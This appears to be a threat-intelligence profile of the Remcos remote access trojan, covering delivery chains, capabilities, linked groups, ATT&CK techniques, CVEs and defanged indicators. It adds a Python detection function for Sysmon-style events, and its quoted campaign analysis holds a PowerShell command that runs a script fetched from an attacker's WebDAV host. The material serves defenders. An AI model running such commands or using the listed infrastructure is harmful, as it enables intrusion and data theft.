Remcos
Remcos RAT (Remote Control & Surveillance) is a commodity Windows remote access trojan/backdoor used by a wide range of threat actors and criminal campaigns. The provided content describes it being delivered through multiple initial access chains, including phishing emails, malicious ZIP archives, weaponized LNK shortcuts, HTML/HTA and PowerShell loaders, WinRAR SFX archives with deceptive double extensions such as .pdf.scr, WebDAV/search-ms abuse, ClickFix pages, GuLoader, and DLL sideloading. Observed lures included payment slips, tax documents, technical documentation, and business-themed files. In several campaigns, execution relied on LOLBINs and trusted Windows components such as regsvr32.exe, mshta.exe, PowerShell, forfiles.exe, curl.exe, finger.exe, and WMI/Invoke-CimMethod, with some chains operating largely in memory to reduce disk artifacts.
Capabilities directly mentioned in the content include screen capture, audio capture, keylogging, browser credential theft, file and process management, automated data exfiltration, and general remote administration/backdoor functionality. Remcos can hide itself by injecting into another process, can use TLS/SSL to encrypt C2 communications, and can serialize collected data with Protobuf. The content also associates Remcos with registry-based persistence and policy modification behavior, including Registry Run keys/startup persistence and disabling Windows Notification Center. MITRE ATT&CK mappings explicitly referenced for Remcos include T1105, T1547.001, and T1056.001.
The malware is repeatedly described as widely used across commodity crimeware and intrusion activity. Threat actors and clusters explicitly linked in the content to using or delivering Remcos include Gorgon Group, Elfin/APT33, Gamaredon Group, Scarlet Goldfinch, BlackToad, and Nigerian BEC actors in the SilverTerrier ecosystem. The content also notes Remcos use in campaigns targeting corporate networks, Russian companies involved in business-process automation software, and sectors such as high-tech, wholesale, manufacturing, and broader enterprise environments.
High-confidence indicators and infrastructure mentioned in the content include gainesboro[.]duckdns[.]org:30277 with botnet name QB-1 from a Trellix-observed Remcos configuration; pmitm.ddns.net and lordtoad.duckdns.org from a JUMPSEC-observed campaign; 84.54.44[.]3:443 in a Scarlet Goldfinch DLL-sideloaded Remcos chain; wmpssvc[.]online:8080, weventlog[.]store:80, and wscsvc[.]online:4080 from a campaign targeting Russian companies; sportsboulevard-shop[.]com/9827/service.exe as a Remcos download URL in that same campaign; mytaxclientcopy[.]com and HTA file xlab22.hta (hash 1b26f7e369e39312e4fcbc993d483b17) from a Qualys-observed fileless chain; and GuLoader-related indicators including Google Drive URLs used to fetch shellcode and a Remcos payload, plus encrypted/decrypted Remcos payload MD5 values bcea24378a2134429ca82164827f1c25 and d5335a1ec161a8430e564bc66c16f894. Additional campaign identifiers explicitly mentioned for one Remcos sample are Sun004 and mutex Sun003-SHQIGL.
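As an added example (not Mallory's or any vendor's code), the delivery and C2 traits summarized above turned into a small triage function run over constructed Sysmon-style events: LOLBIN launches with WebDAV/search-ms paths, double-extension SFX lures, regsvr32 loading a DLL from a user-writable path, Run-key persistence and dynamic-DNS C2 on a non-standard port. The event dict shape, field names and sample values are assumptions.

```python
"""Flag constructed endpoint events for the Remcos traits described above.
Event shape (type/image/cmdline/key/host/port) is an assumption, not a
real telemetry schema."""
import re

LOLBINS = {"regsvr32.exe", "mshta.exe", "powershell.exe", "forfiles.exe",
           "curl.exe", "finger.exe"}
DYNDNS_SUFFIXES = (".duckdns.org", ".ddns.net")
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.(scr|exe|cmd|bat)$", re.I)
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@\d+\\", re.I)          # \\host@80\share\x.ps1
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)

def classify(ev):
    """Return sorted finding labels for one event dict; [] means nothing matched."""
    hits = set()
    if ev["type"] == "process":
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev.get("cmdline", "")
        if DOUBLE_EXT.search(image):            # Invoice.pdf.scr style lure
            hits.add("double_extension_lure")
        if image in LOLBINS:
            if WEBDAV_UNC.search(cmd) or "search-ms:" in cmd.lower():
                hits.add("lolbin_remote_lure")  # script fetched over WebDAV / search-ms
            if "-executionpolicy bypass" in cmd.lower():
                hits.add("powershell_bypass")
            if image == "regsvr32.exe" and USER_WRITABLE.search(cmd):
                hits.add("regsvr32_user_writable_dll")
    elif ev["type"] == "registry" and RUN_KEY.search(ev["key"] + "\\"):
        hits.add("run_key_persistence")
    elif ev["type"] == "network" and ev["host"].lower().endswith(DYNDNS_SUFFIXES):
        hits.add("dyndns_c2")
        if ev["port"] not in (80, 443):         # e.g. the 30277-style ports seen in configs
            hits.add("nonstandard_port")
    return sorted(hits)

SAMPLE_EVENTS = [  # constructed for this example, not from any real incident
    {"type": "process", "image": r"C:\Users\u\Downloads\Invoice_2024.pdf.scr", "cmdline": ""},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File \\files.example.test@80\s\over.ps1"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\u\AppData\Local\Temp\x.dll"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "Updater"},
    {"type": "network", "host": "sample-host.duckdns.org", "port": 30277},
    {"type": "network", "host": "www.example.com", "port": 443},
]

def triage(events):
    """Map event index -> findings for every event that matched something."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}
```

Each label is a heuristic to be tuned against your own baseline; the dynamic-DNS and user-writable-path checks in particular will fire on some legitimate activity.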
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"...Colombian organizations were reported by Darktrace to have been targeted by Blind Eagle in an attack campaign involving the abuse of the Windows vulnerability, tracked as CVE-2024-43451, that has been ongoing since November."
...triggers an exploit for a years-old security flaw in Microsoft Office (CVE-2017-11882) to distribute a new variant of Remcos RAT...
Windows Office Product Spawned Uncommon Process ... CVE-2023-21716 Word RTF Heap Corruption, CVE-2023-36884 Office and Windows HTML RCE Vulnerability ...
Group-IB Threat Intelligence unit discovered a zero-day vulnerability, CVE-2023-38831, in WinRAR, a popular compression tool. Cybercriminals exploited this vulnerability to deliver various malware families, including DarkMe and GuLoader, by crafting ZIP archives with spoofed extensions.
The malware was distributed alongside other malware families, such as GuLoader and Remcos RAT, via malicious ZIP archives posted on popular trading forums or distributed via file-sharing services.
Groups observed using it
35 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Security professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign... This structural evolution within the Remcos RAT phishing campaign allows the primary remote access trojan module to initialize smoothly.
SmartApeSG campaign uses ClickFix page to push Remcos RAT
Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.
In a shift from Scarlet Goldfinch’s usual payload, the malicious DLL sideloads the Remcos remote access tool, replacing the expected NetSupport Manager.
Remcos has a command to hide itself through injecting into another process.
Remcos (Backdoor.Remvio): A commodity remote administration tool (RAT) that can be used to steal information from an infected computer.
MITRE ATT&CK techniques mapped to Remcos: T1105, T1547.001, T1056.001.
The attackers typically use targeted phishing emails with malicious files disguised as legitimate documents to gain initial access, and deploy backdoors such as BrockenDoor, as well as other malware including Remcos and DarkGate.
Every lure document references Ukrainian military asset management procedures, and every one of them is a weaponized LNK file that downloads Remcos RAT through a geo-fenced PowerShell chain.
UAC-0010 (Gamaredon) LNK → PS → DLL (Remcos RAT) Strong delivery overlap, different PS techniques and infrastructure
This was the first time Proofpoint observed UAC-0050 deliver NetSupport, as it has historically used other malware including Remcos and Lumma Stealer, but it has previously used RMMs including Litemanager and Remote Manipulator System (RMS).
The campaign, active as recently as March 24, 2026, delivered four separate malware payloads to a single infected host in one session: Remcos RAT, NetSupport RAT, StealC, and Sectop RAT, also known as ArechClient2.
The expanded toolkit in this phase incorporated commodity tools such as Remcos RAT, Stealerium, StormKitty, and ZZ Stealer...
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others.
"Some of the payloads identified for campaign 2... included... RAT Remcos"
This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Security professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign using localized financial themes.
“The infection begins with a phishing email containing a malicious Windows batch file named Bestellung.CMD as an attachment.”
MITRE ATT&CK® Techniques ... Initial Access T1566.002 ... Spearphishing Link
Execution
8 techniques
MITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
A sophisticated PowerShell-based shellcode loader executing Remcos Remote Access Trojan (RAT) has emerged...
In this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: ‘-ExecutionPolicy Bypass’ ... ‘-File \\internetshortcuts[.]link@80\ePWXBTXU\over.ps1’
“The infection begins with a phishing email containing a malicious Windows batch file named Bestellung.CMD as an attachment.”
The embedded Visual Basic script drops internet connectivity by running the local ipconfig application.
Subsequently, the script loads a renamed AutoIt3 interpreter to handle core decryption actions.
Upon clicking the link in the email or attachment, the recipient would be redirected to the website abusing the “search-ms” URI protocol handler.
As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.
Persistence
3 techniques
MITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Privilege Escalation
4 techniques
MITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
After unpacking the core archives, the malware moves into an advanced code injection stage.
Stealth
7 techniques
This eventually led to the execution of obfuscated PowerShell code that unpacked and ran Lumma Stealer in memory... The attackers hid the final payload inside an old Program Information File format, further lowering the chance that users or tools would catch it.
The application drops an active interpreter along with a fake graphic file. Although the graphic element looks completely normal, it contains hidden script parameters.
After unpacking the core archives, the malware moves into an advanced code injection stage.
The program decodes these items at runtime via a simple single-byte mathematical conversion.
“It then invokes SyncAppvPublishingServer.vbs, which is a legitimate Microsoft App-V component commonly present in enterprise Windows environments.”
If the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.
The loader leverages a specialized position-independent execution stub known as DonutLoader shellcode.
Discovery
3 techniques
MITRE ATT&CK® Techniques ... Discovery T1012 Query Registry
The embedded Visual Basic script drops internet connectivity by running the local ipconfig application ... Finally, the script executes an ipconfig command to safely restore the server’s network connection.
MITRE ATT&CK® Techniques ... Discovery T1082 System Information Discovery
Collection
3 techniques
Once established, Remcos RAT provides attackers with extensive capabilities including screen capture, keylogging...
Archives were the top delivery method in Q2 2025, making up 40 percent of observed threats... One delivery chain involved IMG archives attached to phishing emails.
Specifically, the pipeline drops legitimate archiving utilities onto the host disk to ensure reliable local execution.
Command and Control
8 techniques
Kapeka utilizes JSON objects to send and receive information from command and control nodes. Emotet has used Google’s Protobufs to serialize data sent to and from the C2 server. Remcos can serialize collected data with Protobuf.
Further we see usage of PROPFIND method ... GET method is used to retrieve the content of the file ... MITRE ATT&CK® Techniques ... Command and Control T1071 Application Layer Protocol
The hidden process connects to cloud storage nodes to retrieve compressed helper tools.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
4H RAT has the capability to create a remote shell. AuditCred can open a reverse shell on the system to execute commands. PlugX allows actors to spawn a reverse shell on a victim. QuasarRAT can launch a remote shell to execute commands on the victim’s machine.
These dedicated communication points utilize popular dynamic DNS service providers to maintain stable connections. For example, the decrypted configuration references three separate tracking domains resolving to an identical destination.
MITRE ATT&CK® Techniques ... Command and Control T1571 Non-Standard Port
For all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures.
IOCs tracked for this family
505 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan delivered via phishing email attachment that abuses legitimate Windows administrative components, stages payloads from cloud storage, and uses DonutLoader shellcode for runtime-independent in-memory payload delivery to evade detection and enable compromise and potential data exfiltration.
Remote access trojan delivered via phishing emails using disguised WinRAR SFX archives and dual extensions. The campaign uses a Visual Basic script and a renamed AutoIt3 interpreter, temporarily disrupts network connectivity with ipconfig during second-stage execution to evade detection, then decrypts its configuration with RC4 and connects to redundant dynamic-DNS-based C2 infrastructure.
Remote access trojan used for persistent access after compromise.
A remote access trojan commonly delivered via steganographic image campaigns. In the described chain, it is extracted via a DotNET Loader and injected into memory of legitimate processes to evade EDR, with privilege escalation and fileless persistence support via the loader.